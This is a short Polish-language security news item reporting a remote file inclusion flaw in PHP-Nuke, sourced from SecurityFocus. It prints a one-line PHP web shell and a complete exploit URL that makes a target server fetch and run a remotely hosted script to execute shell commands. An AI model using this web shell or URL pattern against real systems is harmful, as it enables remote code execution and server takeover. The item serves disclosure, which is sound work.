Poważna luka w PHP-Nuke!

Jak donosi serwis Securityfocus odkryta została luka w PHP-Nuke, umożliwiająca wykonywanie komend systemowych oraz uruchamianie jakiegokolwiek kodu PHP.

Luka wykorzystuje dyrektywę odnoszącą się do plików (index.php?file=file) w celu podsunięcia skryptowi adresu url (http://…) do strony, na której znajduje się wcześniej przygotowany kod PHP, który zostanje pobrany i wykonany przez atakowany serwer.

Jako przykład wykorzystany został skrypt PHP wykonujący dowolne polecenie shella (należy go umieścić na wcześniej przygotowanym koncie www):

<?php system($cmd); ?>

Aby wykonać na atakowanym serwerze polecenie „ls -al” z wykorzystaniem powyższego skryptu należy podać adres w następującej formie:

http://atakowany.serwis/index.php?
file=http://adres.przygotowanego.skryptu.php/skrypt.php&cmd=ls%20-al

Inne eksploity można tworzyć postępując analogicznie.

Tekst źródłowy i więcej informacji znajduje się pod adresem:

www.securityfocus.com/archive/1/250777